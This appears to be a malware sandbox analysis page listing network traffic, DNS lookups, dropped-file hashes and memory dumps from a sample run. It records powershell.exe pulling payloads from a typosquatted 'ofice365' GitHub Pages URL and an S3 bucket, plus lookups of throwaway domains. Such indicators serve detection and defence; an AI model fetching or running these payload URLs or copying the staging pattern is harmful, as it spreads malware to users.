    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 917D44137F1F40ABA94A53BD92A34171 Ref B: LON04EDGE1222 Ref C: 2025-03-26T13:11:13Z
    date: Wed, 26 Mar 2025 13:11:13 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239360432411_13QPWJ00JGY7I4CI1&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
    Remote address:
    150.171.27.10:443
    Request
    GET /th?id=OADD2.10239360432411_13QPWJ00JGY7I4CI1&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 490098
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: ACC6563E6B5B4D6CA2FB230F84652D11 Ref B: LON04EDGE1222 Ref C: 2025-03-26T13:11:15Z
    date: Wed, 26 Mar 2025 13:11:14 GMT
  • flag-us
    DNS
    www.cameronreitsma.net
    Remote address:
    8.8.8.8:53
    Request
    www.cameronreitsma.net
    IN A
    Response
  • flag-us
    DNS
    c.pki.goog
    Remote address:
    8.8.8.8:53
    Request
    c.pki.goog
    IN A
    Response
    c.pki.goog
    IN CNAME
    pki-goog.l.google.com
    pki-goog.l.google.com
    IN A
    142.250.180.3
  • flag-gb
    GET
    http://c.pki.goog/r/r1.crl
    Remote address:
    142.250.180.3:80
    Request
    GET /r/r1.crl HTTP/1.1
    Cache-Control: max-age = 3000
    Connection: Keep-Alive
    Accept: */*
    If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT
    User-Agent: Microsoft-CryptoAPI/10.0
    Host: c.pki.goog
    Response
    HTTP/1.1 304 Not Modified
    Date: Wed, 26 Mar 2025 12:24:56 GMT
    Expires: Wed, 26 Mar 2025 13:14:56 GMT
    Age: 2803
    Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
    Cache-Control: public, max-age=3000
    Vary: Accept-Encoding
  • flag-us
    DNS
    www.p6y5m.skin
    Remote address:
    8.8.8.8:53
    Request
    www.p6y5m.skin
    IN A
    Response
  • flag-us
    DNS
    www.hcywyj10.xyz
    Remote address:
    8.8.8.8:53
    Request
    www.hcywyj10.xyz
    IN A
    Response
  • flag-us
    DNS
    www.5335588a59.buzz
    Remote address:
    8.8.8.8:53
    Request
    www.5335588a59.buzz
    IN A
    Response
  • 185.199.108.153:443
    https://ofice365.github.io/1/test.jpg
    tls, http
    powershell.exe
    90.4kB
     3.6MB
     1621
    2609

    HTTP Request

    GET https://ofice365.github.io/1/test.jpg

    HTTP Response

    200
  • 150.171.27.10:443
    tls
    1.4kB
     1.8kB
     12
    10
  • 54.231.235.98:443
    https://leka25.s3.us-east-1.amazonaws.com/ebgApAm.txt
    tls, http
    powershell.exe
    5.6kB
     284.1kB
     113
    216

    HTTP Request

    GET https://leka25.s3.us-east-1.amazonaws.com/ebgApAm.txt

    HTTP Response

    200
  • 150.171.27.10:443
    tse1.mm.bing.net
    tls, http2
    1.2kB
     6.9kB
     15
    13
  • 150.171.27.10:443
    tse1.mm.bing.net
    tls, http2
    1.2kB
     6.9kB
     15
    13
  • 150.171.27.10:443
    tse1.mm.bing.net
    tls, http2
    1.2kB
     6.9kB
     15
    12
  • 150.171.27.10:443
    https://tse1.mm.bing.net/th?id=OADD2.10239360432411_13QPWJ00JGY7I4CI1&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
    tls, http2
    139.4kB
     4.0MB
     2902
    2896

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239353595219_1EGLKLHZ1AZFLS6F4&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239339388084_14BR1HNZO7MDFJS4B&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239353595220_1KBZRW36PLPFPT43I&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239360432410_1ZT9L3WG863INPZDE&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239339388083_1LK8GG0XUINT2UANS&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

    HTTP Response

    200

    HTTP Response

    200

    HTTP Response

    200

    HTTP Response

    200

    HTTP Response

    200

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239360432411_13QPWJ00JGY7I4CI1&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

    HTTP Response

    200
  • 150.171.27.10:443
    tse1.mm.bing.net
    tls, http2
    1.2kB
     6.9kB
     15
    13
  • 142.250.180.3:80
    http://c.pki.goog/r/r1.crl
    http
    476 B
     395 B
     6
    4

    HTTP Request

    GET http://c.pki.goog/r/r1.crl

    HTTP Response

    304
  • 104.18.187.223:80
    Explorer.EXE
  • 8.8.8.8:53
    ofice365.github.io
    dns
    powershell.exe
    64 B
     128 B
     1
    1

    DNS Request

    ofice365.github.io

    DNS Response

    185.199.108.153
    185.199.109.153
    185.199.110.153
    185.199.111.153

  • 8.8.8.8:53
    dns
    158 B
     1
  • 8.8.8.8:53
    dns
    159 B
     1
  • 8.8.8.8:53
    dns
    133 B
     1
  • 8.8.8.8:53
    dns
    118 B
     1
  • 8.8.8.8:53
  • 8.8.8.8:53
    leka25.s3.us-east-1.amazonaws.com
    dns
    powershell.exe
    79 B
     228 B
     1
    1

    DNS Request

    leka25.s3.us-east-1.amazonaws.com

    DNS Response

    54.231.235.98
    16.182.72.138
    54.231.201.242
    3.5.30.248
    16.15.184.197
    16.182.38.186
    16.15.193.102
    16.15.178.169

  • 8.8.8.8:53
    tse1.mm.bing.net
    dns
    62 B
     170 B
     1
    1

    DNS Request

    tse1.mm.bing.net

    DNS Response

    150.171.27.10
    150.171.28.10

  • 8.8.8.8:53
    www.cameronreitsma.net
    dns
    68 B
     130 B
     1
    1

    DNS Request

    www.cameronreitsma.net

  • 8.8.8.8:53
    c.pki.goog
    dns
    56 B
     107 B
     1
    1

    DNS Request

    c.pki.goog

    DNS Response

    142.250.180.3

  • 8.8.8.8:53
    www.p6y5m.skin
    dns
    60 B
     125 B
     1
    1

    DNS Request

    www.p6y5m.skin

  • 8.8.8.8:53
    www.hcywyj10.xyz
    dns
    62 B
     127 B
     1
    1

    DNS Request

    www.hcywyj10.xyz

  • 8.8.8.8:53
    www.5335588a59.buzz
    dns
    65 B
     132 B
     1
    1

    DNS Request

    www.5335588a59.buzz

  • 8.8.8.8:53

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    3KB

    MD5

    f41839a3fe2888c8b3050197bc9a0a05

    SHA1

    0798941aaf7a53a11ea9ed589752890aee069729

    SHA256

    224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

    SHA512

    2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    64B

    MD5

    79ecaa8145bff6e8a1aaab3c5f6734d8

    SHA1

    e610d761051a652b380e747b849736e3989e4829

    SHA256

    bc6c8a70d47dbccee4afbcce8fb60f9820cbf13b981126df11b965753df0f5a8

    SHA512

    9d4767b93811d25084a44e2665556fecad53bba462e3beb765a1e8028c34dcabf538aecc0a8728ec9acc80a2617e844ad97e747b9347ac775796da7d9dedaef1

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qt3ndzaa.oo1.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • memory/1800-29-0x00007FFAA4040000-0x00007FFAA4B01000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1800-12-0x00007FFAA4040000-0x00007FFAA4B01000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1800-11-0x00007FFAA4040000-0x00007FFAA4B01000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1800-1-0x000002C461470000-0x000002C461492000-memory.dmp

    Filesize

    136KB

    Download

  • memory/1800-0-0x00007FFAA4043000-0x00007FFAA4045000-memory.dmp

    Filesize

    8KB

    Download

  • memory/3424-37-0x00000000074F0000-0x0000000007594000-memory.dmp

    Filesize

    656KB

    Download

  • memory/4684-32-0x0000000000220000-0x0000000000236000-memory.dmp

    Filesize

    88KB

    Download

  • memory/4684-33-0x0000000000EA0000-0x0000000000ECF000-memory.dmp

    Filesize

    188KB

    Download

  • memory/5052-23-0x0000000000400000-0x000000000042F000-memory.dmp

    Filesize

    188KB

    Download

  • memory/5052-31-0x0000000000400000-0x000000000042F000-memory.dmp

    Filesize

    188KB

    Download

  • memory/5196-22-0x000002561FFD0000-0x000002561FFE8000-memory.dmp

    Filesize

    96KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.